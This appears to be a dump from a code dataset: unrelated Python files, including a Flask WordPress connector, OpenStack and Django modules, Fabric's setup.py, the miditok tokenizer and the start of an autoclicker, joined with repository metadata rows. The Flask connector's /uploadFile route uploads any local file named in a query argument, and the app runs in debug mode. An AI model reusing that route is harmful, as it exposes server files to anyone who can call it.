secrets = lockerfs.loadJsonFile("secrets.json")
secrets["url"] = request.form["url"]
secrets["user"] = request.form["user"]
secrets["password"] = request.form["password"]
secrets["server_type"] = "wordpress" # !!! other types are awaiting testing
start(secrets)
lockerfs.saveJsonFile("secrets.json", secrets)
return json.dumps("started")
def start(secrets):
logging.info("Starting")
app.client = client.Client(app.info, url=secrets["url"], user=secrets["user"], password=secrets["password"], server_type=secrets["server_type"])
app.started = True
@app.route("/update")
def update():
if app.client:
app.client.update()
return json.dumps("updated")
else:
return json.dumps("no login")
@app.route("/")
def index():
if app.started:
return json.dumps({
"/info" : "User info",
"/blogs" : "List of users blogs",
"/posts" : "List of users posts",
"/comments" : "Comments on users posts",
"/pingbacks" : "Pingbacks to users blogs",
"/trackbacks" : "Trackbacks to users blogs",
"/update" : "update to refresh info"
})
else:
return redirect(lockerfs.loadMeData()["uri"] + "setupAuth")
def matches_arg(value, arg):
# either a literal match or a range [lo,hi]
if type(arg) is list and len(arg) is 2:
(lo, hi) = arg
return (lo <= value) and (value < hi)
else:
return (value == arg)
@app.route("/info")
def info():
return json.dumps(app.client.user_info)
@app.route("/blogs")
def blogs():
blogs = app.client.blogs
for key, value in request.args.items():
blogs = [blog for blog in blogs if matches_arg(blog[key], json.loads(value))]
return json.dumps(blogs)
@app.route("/posts")
def posts():
posts = app.client.posts
for key, value in request.args.items():
posts = [post for post in posts if matches_arg(post[key], json.loads(value))]
return json.dumps(posts)
@app.route("/comments")
def comments():
comments = app.client.comments
for key, value in request.args.items():
comments = [comment for comment in comments if matches_arg(comment[key], json.loads(value))]
return json.dumps(comments)
@app.route("/pingbacks")
def pingbacks():
pingbacks = app.client.pingbacks
for key, value in request.args.items():
pingbacks = [pingback for pingback in pingbacks if matches_arg(pingback[key], json.loads(value))]
return json.dumps(pingbacks)
@app.route("/trackbacks")
def trackbacks():
trackbacks = app.client.trackbacks
for key, value in request.args.items():
trackbacks = [trackback for trackback in trackbacks if matches_arg(trackback[key], json.loads(value))]
return json.dumps(trackbacks)
@app.route("/uploadFile")
def uploadFile():
f = request.args["file"]
data = {}
data["name"] = os.path.basename(f)
data["type"] = "image/jpeg"
data["bits"] = xmlrpclib.Binary(open(f).read())
data["overwrite"] = 1
app.client._server.wp.uploadFile('', app.client.user, app.client.password, data)
return "kthxbye"
def runService(info):
app.info = info
app.client = None
app.started = False
secrets = lockerfs.loadJsonFile("secrets.json")
if "url" in secrets and "user" in secrets and "password" in secrets:
start(secrets)
else:
logging.info("No auth details available")
app.debug = True
app.run(port=app.info["port"], use_reloader=False)
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO,
format='%(levelname)-8s %(message)s')
runService({"port": 7474})
| 30.485294
| 148
| 0.638929
|
794feb5bad6a6e38b8e8a889fc828d7f46c9ac43
| 1,702
|
py
|
Python
|
nova/api/openstack/compute/views/addresses.py
|
russellb/nova
|
99c2e02b44a1012c8e26fc7658dc40ec4620a1ee
|
[
"Apache-2.0"
] | 1
|
2015-07-15T08:51:16.000Z
|
2015-07-15T08:51:16.000Z
|
nova/api/openstack/compute/views/addresses.py
|
russellb/nova
|
99c2e02b44a1012c8e26fc7658dc40ec4620a1ee
|
[
"Apache-2.0"
] | 1
|
2020-07-24T14:14:13.000Z
|
2020-07-24T14:14:13.000Z
|
nova/api/openstack/compute/views/addresses.py
|
russellb/nova
|
99c2e02b44a1012c8e26fc7658dc40ec4620a1ee
|
[
"Apache-2.0"
] | 2
|
2019-06-12T00:52:15.000Z
|
2020-07-24T10:35:29.000Z
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010-2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
from nova.api.openstack import common
from nova import flags
from nova import log as logging
FLAGS = flags.FLAGS
LOG = logging.getLogger(__name__)
class ViewBuilder(common.ViewBuilder):
"""Models server addresses as a dictionary."""
_collection_name = "addresses"
def basic(self, ip):
"""Return a dictionary describing an IP address."""
return {
"version": ip["version"],
"addr": ip["address"],
}
def show(self, network, label):
"""Returns a dictionary describing a network."""
all_ips = itertools.chain(network["ips"], network["floating_ips"])
return {label: [self.basic(ip) for ip in all_ips]}
def index(self, networks):
"""Return a dictionary describing a list of networks."""
addresses = {}
for label, network in networks.items():
network_dict = self.show(network, label)
addresses[label] = network_dict[label]
return dict(addresses=addresses)
| 32.113208
| 78
| 0.673325
|
794fec61d2e6c7bcd2e3259336a3fed2b499024c
| 395
|
py
|
Python
|
memmories/asgi.py
|
EidAbdullahi/gallery-application
|
b1a0952b3d111408c33d7ec279f5d1d5b35638c6
|
[
"Info-ZIP"
] | null | null | null |
memmories/asgi.py
|
EidAbdullahi/gallery-application
|
b1a0952b3d111408c33d7ec279f5d1d5b35638c6
|
[
"Info-ZIP"
] | null | null | null |
memmories/asgi.py
|
EidAbdullahi/gallery-application
|
b1a0952b3d111408c33d7ec279f5d1d5b35638c6
|
[
"Info-ZIP"
] | null | null | null |
"""
ASGI config for memmories project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'memmories.settings')
application = get_asgi_application()
| 23.235294
| 78
| 0.787342
|
794feda5e6eb8570322380edee0e8793a241634d
| 5,274
|
py
|
Python
|
cride/users/migrations/0001_initial.py
|
MrRomo/cride
|
9ceef8169b6ad49fd3063758898b03abcb47f682
|
[
"MIT"
] | null | null | null |
cride/users/migrations/0001_initial.py
|
MrRomo/cride
|
9ceef8169b6ad49fd3063758898b03abcb47f682
|
[
"MIT"
] | null | null | null |
cride/users/migrations/0001_initial.py
|
MrRomo/cride
|
9ceef8169b6ad49fd3063758898b03abcb47f682
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.1 on 2020-11-24 00:39
from django.conf import settings
import django.contrib.auth.models
import django.contrib.auth.validators
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
('first_name', models.CharField(blank=True, max_length=150, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('created', models.DateTimeField(auto_now_add=True, help_text='Date time on which the object was created.', verbose_name='created at')),
('modified', models.DateTimeField(auto_now=True, help_text='Date time on which the object was last modified.', verbose_name='modified at')),
('email', models.EmailField(error_messages={'unique': 'A user with that email already exists.'}, max_length=254, unique=True, verbose_name='email address')),
('phone_number', models.CharField(blank=True, max_length=17, validators=[django.core.validators.RegexValidator(message='Phone number must be entered in the format: +999999999. Up to 15 digits allowed.', regex='\\+?1?\\d{9,15}$')])),
('is_client', models.BooleanField(default=True, help_text='Help easily distinguish users and perform queries. Clients are the main type of user.', verbose_name='client')),
('is_verified', models.BooleanField(default=True, help_text='Set to true when the user have verified its email address.', verbose_name='verified')),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'ordering': ['-created', '-modified'],
'get_latest_by': 'created',
'abstract': False,
},
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, help_text='Date time on which the object was created.', verbose_name='created at')),
('modified', models.DateTimeField(auto_now=True, help_text='Date time on which the object was last modified.', verbose_name='modified at')),
('picture', models.ImageField(blank=True, null=True, upload_to='users/pictures/', verbose_name='profile picture')),
('biography', models.TextField(blank=True, max_length=500)),
('rides_taken', models.PositiveIntegerField(default=0)),
('rides_offered', models.PositiveIntegerField(default=0)),
('reputation', models.FloatField(default=5.0, help_text="User's reputation based on the rides taken and offered.")),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-created', '-modified'],
'get_latest_by': 'created',
'abstract': False,
},
),
]
| 73.25
| 329
| 0.658324
|
794fee25dc427259929694990bd4731534be77d3
| 2,169
|
py
|
Python
|
setup.py
|
aleszoulek/fabric
|
586518f89c9341fbbba6a29d62bd052f2edcb319
|
[
"BSD-2-Clause"
] | 1
|
2022-02-18T05:31:07.000Z
|
2022-02-18T05:31:07.000Z
|
setup.py
|
aleszoulek/fabric
|
586518f89c9341fbbba6a29d62bd052f2edcb319
|
[
"BSD-2-Clause"
] | null | null | null |
setup.py
|
aleszoulek/fabric
|
586518f89c9341fbbba6a29d62bd052f2edcb319
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python
import sys
from setuptools import setup, find_packages
from fabric.version import get_version
readme = open('README').read()
long_description = """
To find out what's new in this version of Fabric, please see `the changelog
<http://docs.fabfile.org/changes/%s.html>`_.
----
%s
----
For more information, please see the Fabric website or execute ``fab --help``.
""" % (get_version('short'), readme)
# PyCrypto>2.0 + Python 2.5 + pip == bad times.
# We can't easily detect pip usage at this point, but we can at least limit our
# "downgrade" of the PyCrypto requirement to 2.5-only.
PYCRYPTO = "<2.1" if (sys.version_info[:2] == (2, 5)) else ">=1.9"
setup(
name='Fabric',
version=get_version('short'),
description='Fabric is a simple, Pythonic tool for remote execution and deployment.',
long_description=long_description,
author='Jeff Forcier',
author_email='jeff@bitprophet.org',
url='http://fabfile.org',
packages=find_packages(),
test_suite='nose.collector',
tests_require=['nose', 'fudge'],
install_requires=['pycrypto %s' % PYCRYPTO, 'paramiko >=1.7.6'],
entry_points={
'console_scripts': [
'fab = fabric.main:main',
]
},
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: BSD License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Unix',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Topic :: Software Development',
'Topic :: Software Development :: Build Tools',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: System :: Clustering',
'Topic :: System :: Software Distribution',
'Topic :: System :: Systems Administration',
],
)
| 31.897059
| 89
| 0.61964
|
794fee9830aaeacb45de64c0f4e2bc6d205b5345
| 750
|
py
|
Python
|
flask/code/P9.FlaskMarshalling/app.py
|
santiagovj22/python-training
|
3fbcc9e5df22432c6e75d80c90d1c235652354df
|
[
"MIT"
] | null | null | null |
flask/code/P9.FlaskMarshalling/app.py
|
santiagovj22/python-training
|
3fbcc9e5df22432c6e75d80c90d1c235652354df
|
[
"MIT"
] | null | null | null |
flask/code/P9.FlaskMarshalling/app.py
|
santiagovj22/python-training
|
3fbcc9e5df22432c6e75d80c90d1c235652354df
|
[
"MIT"
] | null | null | null |
#Example 9
import logging
from flask import Flask
from flask_restx import Api
from controllers.games_controller import init_games_controller
def get_app(name, configuration):
app = Flask(name)
#Configure logger
#LOG_FILENAME = './logs/app.log'
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s %(name)s %(threadName)s : %(message)s')
app.logger.debug('Starting API Server')
app.config['MONGO_URI'] = configuration['MONGO_URI']
api = Api(app, validate=True)
init_games_controller(app, api)
return app
if __name__ == '__main__':
print('start')
get_app(__name__, {'MONGO_URI' :'mongodb://flask:flaskpwd@localhost:27017/gamestore?authSource=gamestore'}).run(debug=False)
| 25
| 128
| 0.714667
|
794fef1245b0fa8f8e1d34ec8c93254cbbe02367
| 22,867
|
py
|
Python
|
miditok/cp_word.py
|
ilya16/MidiTok
|
03d80fadbdf5bbe7802d97f7424638cff96e1a2b
|
[
"MIT"
] | null | null | null |
miditok/cp_word.py
|
ilya16/MidiTok
|
03d80fadbdf5bbe7802d97f7424638cff96e1a2b
|
[
"MIT"
] | null | null | null |
miditok/cp_word.py
|
ilya16/MidiTok
|
03d80fadbdf5bbe7802d97f7424638cff96e1a2b
|
[
"MIT"
] | null | null | null |
""" MIDI encoding method, similar to Compound Word
https://arxiv.org/abs/2101.02402
"""
from typing import List, Tuple, Dict, Optional, Union
import numpy as np
from miditoolkit import Instrument, Note, TempoChange
from .midi_tokenizer_base import MIDITokenizer, Vocabulary, Event, detect_chords
from .constants import *
class CPWord(MIDITokenizer):
""" MIDI encoding method, similar to Compound Word
https://arxiv.org/abs/2101.02402
Each compound token will be a list of the form:
(index. Token type)
0. Family
1. Bar/Position
2. Pitch
3. Velocity
4. Duration
(5. Program) optional, associated with notes (pitch/velocity/duration) or chords
(6. Chord) optional, chords occurring with position tokens
(7. Rest) optional, rest acting as a time-shift token
(8. Tempo) optional, occurring with position tokens
This means a "compound token" can contain between 5 and 7 elements depending on
your encoding parameters (additional tokens).
(the choice of using indexes instead of dictionary with keys is to reduce the memory
and storage usage for saved token files)
:param pitch_range: range of used MIDI pitches
:param beat_res: beat resolutions, with the form:
{(beat_x1, beat_x2): beat_res_1, (beat_x2, beat_x3): beat_res_2, ...}
The keys of the dict are tuples indicating a range of beats, ex 0 to 3 for the first bar
The values are the resolution, in samples per beat, of the given range, ex 8
:param nb_velocities: number of velocity bins
:param additional_tokens: specifies additional tokens (chords, time signature, rests, tempo...)
:param sos_eos_tokens: adds Start Of Sequence (SOS) and End Of Sequence (EOS) tokens to the vocabulary
:param mask: will add a MASK token to the vocabulary (default: False)
:param params: can be a path to the parameter (json encoded) file or a dictionary
"""
def __init__(self, pitch_range: range = PITCH_RANGE, beat_res: Dict[Tuple[int, int], int] = BEAT_RES,
nb_velocities: int = NB_VELOCITIES, additional_tokens: Dict[str, bool] = ADDITIONAL_TOKENS,
sos_eos_tokens: bool = False, mask: bool = False, params=None):
# Indexes of additional token types within a compound token
add_idx = 5
self.program_ixd = self.chord_idx = self.rest_idx = self.tempo_idx = None
if additional_tokens['Program']:
self.program_ixd = add_idx
add_idx += 1
if additional_tokens['Chord']:
self.chord_idx = add_idx
add_idx += 1
if additional_tokens['Rest']:
self.rest_idx = add_idx
add_idx += 1
if additional_tokens['Tempo']:
self.tempo_idx = add_idx
super().__init__(pitch_range, beat_res, nb_velocities, additional_tokens, sos_eos_tokens, mask, params)
def track_to_tokens(self, track: Instrument) -> List[List[int]]:
""" Converts a track (miditoolkit.Instrument object) into a sequence of tokens
:param track: MIDI track to convert
:return: sequence of corresponding tokens
"""
# Make sure the notes are sorted first by their onset (start) times, second by pitch
# notes.sort(key=lambda x: (x.start, x.pitch)) # done in midi_to_tokens
ticks_per_sample = self.current_midi_metadata['time_division'] / max(self.beat_res.values())
ticks_per_bar = self.current_midi_metadata['time_division'] * 4
dur_bins = self.durations_ticks[self.current_midi_metadata['time_division']]
min_rest = self.current_midi_metadata['time_division'] * self.rests[0][0] + ticks_per_sample * self.rests[0][1]\
if self.additional_tokens['Rest'] else 0
tokens = [] # list of lists of tokens
# Creates tokens
previous_tick = -1
previous_note_end = track.notes[0].start + 1 # so that no rest is created before the first note
current_bar = -1
current_tempo_idx = 0
current_tempo = self.current_midi_metadata['tempo_changes'][current_tempo_idx].tempo
for note in track.notes:
# Bar / Position / (Tempo) / (Rest)
if note.start != previous_tick:
# (Rest)
if self.additional_tokens['Rest'] and note.start > previous_note_end and \
note.start - previous_note_end >= min_rest:
previous_tick = previous_note_end
rest_beat, rest_pos = divmod(note.start - previous_tick,
self.current_midi_metadata['time_division'])
rest_beat = min(rest_beat, max([r[0] for r in self.rests]))
rest_pos = round(rest_pos / ticks_per_sample)
if rest_beat > 0:
tokens.append(self.create_cp_token(previous_note_end, rest=f'{rest_beat}.0', desc='Rest'))
previous_tick += rest_beat * self.current_midi_metadata['time_division']
while rest_pos >= self.rests[0][1]:
rest_pos_temp = min([r[1] for r in self.rests], key=lambda x: abs(x - rest_pos))
tokens.append(self.create_cp_token(previous_note_end, rest=f'0.{rest_pos_temp}', desc='Rest'))
previous_tick += round(rest_pos_temp * ticks_per_sample)
rest_pos -= rest_pos_temp
current_bar = previous_tick // ticks_per_bar
# (Tempo)
if self.additional_tokens['Tempo']:
# If the current tempo is not the last one
if current_tempo_idx + 1 < len(self.current_midi_metadata['tempo_changes']):
# Will loop over incoming tempo changes
for tempo_change in self.current_midi_metadata['tempo_changes'][current_tempo_idx + 1:]:
# If this tempo change happened before the current moment
if tempo_change.time <= note.start:
current_tempo = tempo_change.tempo
current_tempo_idx += 1 # update tempo value (might not change) and index
elif tempo_change.time > note.start:
break # this tempo change is beyond the current time step, we break the loop
# Bar
nb_new_bars = note.start // ticks_per_bar - current_bar
for i in range(nb_new_bars):
tokens.append(self.create_cp_token((current_bar + i + 1) * ticks_per_bar, bar=True, desc='Bar'))
current_bar += nb_new_bars
# Position
pos_index = int((note.start % ticks_per_bar) / ticks_per_sample)
tokens.append(self.create_cp_token(int(note.start), pos=pos_index,
tempo=current_tempo if self.additional_tokens['Tempo'] else None,
desc='Position'))
previous_tick = note.start
# Note
duration = note.end - note.start
dur_index = np.argmin(np.abs(dur_bins - duration))
dur_value = '.'.join(map(str, self.durations[dur_index]))
tokens.append(self.create_cp_token(int(note.start), pitch=note.pitch, vel=note.velocity, dur=dur_value,
desc=f'{duration} ticks'))
previous_note_end = max(previous_note_end, note.end)
tokens.sort(key=lambda x: x[0].time)
# Adds chord tokens if specified
if self.additional_tokens['Chord'] and not track.is_drum:
chord_events = detect_chords(track.notes, self.current_midi_metadata['time_division'], self._first_beat_res)
count = 0
for chord_event in chord_events:
for e, cp_token in enumerate(tokens[count:]):
if cp_token[0].time == chord_event.time and cp_token[0].desc == 'Position':
cp_token[self.chord_idx] = \
self.vocab[self.chord_idx].event_to_token[f'Chord_{chord_event.value}']
count = e
break
# Convert the first element of each compound token from Event to int
for cp_token in tokens:
cp_token[0] = self.vocab[0].event_to_token[f'Family_{cp_token[0].value}']
return tokens
def create_cp_token(self, time: int, bar: bool = False, pos: int = None, pitch: int = None, vel: int = None,
dur: str = None, chord: str = None, rest: str = None, tempo: int = None, program: int = None,
desc: str = '') -> List[Union[Event, int]]:
""" Create a CP Word token, with the following structure:
(index. Token type)
0. Family
1. Bar/Position
2. Pitch
3. Velocity
4. Duration
(5. Program) optional, associated with notes (pitch/velocity/duration) or chords
(6. Chord) optional, chords occurring with position tokens
(7. Rest) optional, rest acting as a time-shift token
(8. Tempo) optional, occurring with position tokens
NOTE: the first Family token (first in list) will be given as an Event object to keep track
of time easily so that other method can sort CP tokens afterwards.
:param time: the current tick
:param bar: True if this token represents a new bar occurring
:param pos: the position index
:param pitch: note pitch
:param vel: note velocity
:param dur: note duration
:param chord: chord value
:param rest: rest value
:param tempo: tempo index
:param program: a program number if you want to produce a Program CP token (read note above)
:param desc: an optional argument for debug and used to spot position tokens in track_to_tokens
:return: The compound token as a list of integers
"""
cp_token_template = [Event(type_='Family', time=time, value='Metric', desc=desc),
self.vocab[1].event_to_token['Position_Ignore'],
self.vocab[2].event_to_token['Pitch_Ignore'],
self.vocab[3].event_to_token['Velocity_Ignore'],
self.vocab[4].event_to_token['Duration_Ignore']]
if self.additional_tokens['Program']:
cp_token_template.append(self.vocab[self.program_ixd].event_to_token['Program_Ignore'])
if self.additional_tokens['Chord']:
cp_token_template.append(self.vocab[self.chord_idx].event_to_token['Chord_Ignore'])
if self.additional_tokens['Rest']:
cp_token_template.append(self.vocab[self.rest_idx].event_to_token['Rest_Ignore'])
if self.additional_tokens['Tempo']:
cp_token_template.append(self.vocab[self.tempo_idx].event_to_token['Tempo_Ignore'])
if bar:
cp_token_template[1] = self.vocab[1].event_to_token['Bar_None']
elif pos is not None:
cp_token_template[1] = self.vocab[1].event_to_token[f'Position_{pos}']
if chord is not None:
cp_token_template[self.chord_idx] = self.vocab[self.chord_idx].event_to_token[f'Chord_{chord}']
if tempo is not None:
cp_token_template[self.tempo_idx] = self.vocab[self.tempo_idx].event_to_token[f'Tempo_{tempo}']
elif rest is not None:
cp_token_template[self.rest_idx] = self.vocab[self.rest_idx].event_to_token[f'Rest_{rest}']
elif pitch is not None:
cp_token_template[0].value = 'Note'
cp_token_template[2] = self.vocab[2].event_to_token[f'Pitch_{pitch}']
cp_token_template[3] = self.vocab[3].event_to_token[f'Velocity_{vel}']
cp_token_template[4] = self.vocab[4].event_to_token[f'Duration_{dur}']
if program is not None:
cp_token_template[self.program_ixd] = \
self.vocab[self.program_ixd].event_to_token[f'Program_{program}']
return cp_token_template
def tokens_to_track(self, tokens: List[List[int]], time_division: Optional[int] = TIME_DIVISION,
program: Optional[Tuple[int, bool]] = (0, False)) -> Tuple[Instrument, List[TempoChange]]:
""" Converts a sequence of tokens into a track object
:param tokens: sequence of tokens to convert
:param time_division: MIDI time division / resolution, in ticks/beat (of the MIDI to create)
:param program: the MIDI program of the produced track and if it drum, (default (0, False), piano)
:return: the miditoolkit instrument object and tempo changes
"""
assert time_division % max(self.beat_res.values()) == 0,\
f'Invalid time division, please give one divisible by {max(self.beat_res.values())}'
events = self.tokens_to_events(tokens, multi_voc=True)
ticks_per_sample = time_division // max(self.beat_res.values())
ticks_per_bar = time_division * 4
name = 'Drums' if program[1] else MIDI_INSTRUMENTS[program[0]]['name']
instrument = Instrument(program[0], is_drum=program[1], name=name)
tempo_changes = [TempoChange(TEMPO, -1)] # mock the first tempo change to optimize below
current_tick = 0
current_bar = -1
previous_note_end = 0
for compound_token in events:
token_family = compound_token[0].value
if token_family == 'Note':
if any(tok.value == 'None' for tok in compound_token[1:5]):
continue
pitch = int(compound_token[2].value)
vel = int(compound_token[3].value)
duration = self._token_duration_to_ticks(compound_token[4].value, time_division)
instrument.notes.append(Note(vel, pitch, current_tick, current_tick + duration))
previous_note_end = max(previous_note_end, current_tick + duration)
elif token_family == 'Metric':
if compound_token[1].type == 'Bar':
current_bar += 1
current_tick = current_bar * ticks_per_bar
elif compound_token[1].value != 'Ignore': # i.e. its a position
if current_bar == -1:
current_bar = 0 # as this Position token occurs before any Bar token
current_tick = current_bar * ticks_per_bar + int(compound_token[1].value) * ticks_per_sample
if self.additional_tokens['Tempo']:
tempo = int(compound_token[-1].value)
if tempo != tempo_changes[-1].tempo:
tempo_changes.append(TempoChange(tempo, current_tick))
elif compound_token[self.rest_idx].value != 'Ignore': # i.e. its a rest
if current_tick < previous_note_end: # if in case successive rest happen
current_tick = previous_note_end
beat, pos = map(int, compound_token[self.rest_idx].value.split('.'))
current_tick += beat * time_division + pos * ticks_per_sample
current_bar = current_tick // ticks_per_bar
if len(tempo_changes) > 1:
del tempo_changes[0]
tempo_changes[0].time = 0
return instrument, tempo_changes
def _create_vocabulary(self, sos_eos_tokens: bool = None) -> List[Vocabulary]:
""" Creates the Vocabulary object of the tokenizer.
See the docstring of the Vocabulary class for more details about how to use it.
:param sos_eos_tokens: DEPRECIATED, will include Start Of Sequence (SOS) and End Of Sequence (tokens)
:return: the vocabulary object
"""
if sos_eos_tokens is not None:
print(f'\033[93msos_eos_tokens argument is depreciated and will be removed in a future update, '
f'_create_vocabulary now uses self._sos_eos attribute set a class init \033[0m')
vocab = [Vocabulary({'PAD_None': 0}, sos_eos=self._sos_eos, mask=self._mask) for _ in range(5)]
vocab[0].add_event('Family_Metric')
vocab[0].add_event('Family_Note')
# POSITION
nb_positions = max(self.beat_res.values()) * 4 # 4/* time signature
vocab[1].add_event('Position_Ignore')
vocab[1].add_event('Bar_None')
vocab[1].add_event(f'Position_{i}' for i in range(nb_positions))
# PITCH
vocab[2].add_event('Pitch_Ignore')
vocab[2].add_event(f'Pitch_{i}' for i in self.pitch_range)
# VELOCITY
vocab[3].add_event('Velocity_Ignore')
vocab[3].add_event(f'Velocity_{i}' for i in self.velocities)
# DURATION
vocab[4].add_event('Duration_Ignore')
vocab[4].add_event(f'Duration_{".".join(map(str, duration))}' for duration in self.durations)
# PROGRAM
if self.additional_tokens['Program']:
vocab.append(Vocabulary({'PAD_None': 0}, sos_eos=self._sos_eos, mask=self._mask))
vocab[-1].add_event('Program_Ignore')
vocab[-1].add_event(f'Program_{program}' for program in range(-1, 128))
# CHORD
if self.additional_tokens['Chord']:
vocab.append(Vocabulary({'PAD_None': 0}, sos_eos=self._sos_eos, mask=self._mask))
vocab[-1].add_event('Chord_Ignore')
vocab[-1].add_event(f'Chord_{i}' for i in range(3, 6)) # non recognized chords (between 3 and 5 notes)
vocab[-1].add_event(f'Chord_{chord_quality}' for chord_quality in CHORD_MAPS)
# REST
if self.additional_tokens['Rest']:
vocab.append(Vocabulary({'PAD_None': 0}, sos_eos=self._sos_eos, mask=self._mask))
vocab[-1].add_event('Rest_Ignore')
vocab[-1].add_event(f'Rest_{".".join(map(str, rest))}' for rest in self.rests)
# TEMPO
if self.additional_tokens['Tempo']:
vocab.append(Vocabulary({'PAD_None': 0}, sos_eos=self._sos_eos, mask=self._mask))
vocab[-1].add_event('Tempo_Ignore')
vocab[-1].add_event(f'Tempo_{i}' for i in self.tempos)
return vocab
def _create_token_types_graph(self) -> Dict[str, List[str]]:
""" Returns a graph (as a dictionary) of the possible token
types successions.
As with CP the tokens types are "merged", each state here corresponds to
a "compound" token, which is characterized by the token types Program, Bar,
Position/Chord/Tempo and Pitch/Velocity/Duration
Here the combination of Pitch, Velocity and Duration tokens is represented by
"Pitch" in the graph.
NOTE: Program type is not referenced here, you can add it manually by
modifying the tokens_types_graph class attribute following your strategy.
:return: the token types transitions dictionary
"""
dic = dict()
dic['Bar'] = ['Position', 'Bar']
dic['Position'] = ['Pitch']
dic['Pitch'] = ['Pitch', 'Bar', 'Position']
if self.additional_tokens['Chord']:
dic['Rest'] = ['Rest', 'Position']
dic['Pitch'] += ['Rest']
if self.additional_tokens['Rest']:
dic['Rest'] = ['Rest', 'Position', 'Bar']
dic['Pitch'] += ['Rest']
self._add_pad_type_to_graph(dic)
return dic
def token_types_errors(self, tokens: List[List[int]], consider_pad: bool = False) -> float:
""" Checks if a sequence of tokens is constituted of good token types
successions and returns the error ratio (lower is better).
The Pitch and Position values are also analyzed:
- a position token cannot have a value <= to the current position (it would go back in time)
- a pitch token should not be present if the same pitch is already played at the current position
:param tokens: sequence of tokens to check
:param consider_pad: if True will continue the error detection after the first PAD token (default: False)
:return: the error ratio (lower is better)
"""
def cp_token_type(tok: List[int]) -> Tuple[str, str]:
family = self.vocab[0].token_to_event[tok[0]].split('_')[1]
if family == 'Note':
return self.vocab[2].token_to_event[tok[2]].split('_')
elif family == 'Metric':
bar_pos = self.vocab[1].token_to_event[tok[1]].split('_')
if bar_pos[1] != 'Ignore':
return bar_pos
else: # additional token
for i in range(1, 5):
decoded_token = self.vocab[-i].token_to_event[tok[-i]].split('_')
if decoded_token[1] != 'Ignore':
return decoded_token
raise RuntimeError('No token type found, unknown error')
elif family == 'None':
return 'PAD', 'None'
else: # Program
raise RuntimeError('No token type found, unknown error')
err = 0
previous_type = cp_token_type(tokens[0])[0]
current_pos = -1
current_pitches = []
def check(tok: List[int]):
nonlocal err, previous_type, current_pos, current_pitches
token_type, token_value = cp_token_type(tok)
# Good token type
if token_type in self.tokens_types_graph[previous_type]:
if token_type == 'Bar': # reset
current_pos = -1
current_pitches = []
elif token_type == 'Pitch':
if int(token_value) in current_pitches:
err += 1 # pitch already played at current position
else:
current_pitches.append(int(token_value))
elif token_type == 'Position':
if int(token_value) <= current_pos and previous_type != 'Rest':
err += 1 # token position value <= to the current position
else:
current_pos = int(token_value)
current_pitches = []
# Bad token type
else:
err += 1
previous_type = token_type
if consider_pad:
for token in tokens[1:]:
check(token)
else:
for token in tokens[1:]:
if previous_type == 'PAD':
break
check(token)
return err / len(tokens)
| 51.61851
| 120
| 0.599729
|
794fef505fbd8acc556f458e74026b744391c9bc
| 10,506
|
py
|
Python
|
GUI.py
|
Archie-Dev-main/AutoClicker
|
cb3b496abfba9a98737d615f0f761899d50f88f4
|
[
"MIT"
] | null | null | null |
GUI.py
|
Archie-Dev-main/AutoClicker
|
cb3b496abfba9a98737d615f0f761899d50f88f4
|
[
"MIT"
] | null | null | null |
GUI.py
|
Archie-Dev-main/AutoClicker
|
cb3b496abfba9a98737d615f0f761899d50f88f4
|
[
"MIT"
] | null | null | null |
# Uses the installer class to check for and install missing modules
import installer
install = installer.Installer()
install.install_required_modules()
import tkinter as tk
import mouse
import time
from sys import maxsize
import ExitSplash as ES
# The main housing for both the GUI and the entire program
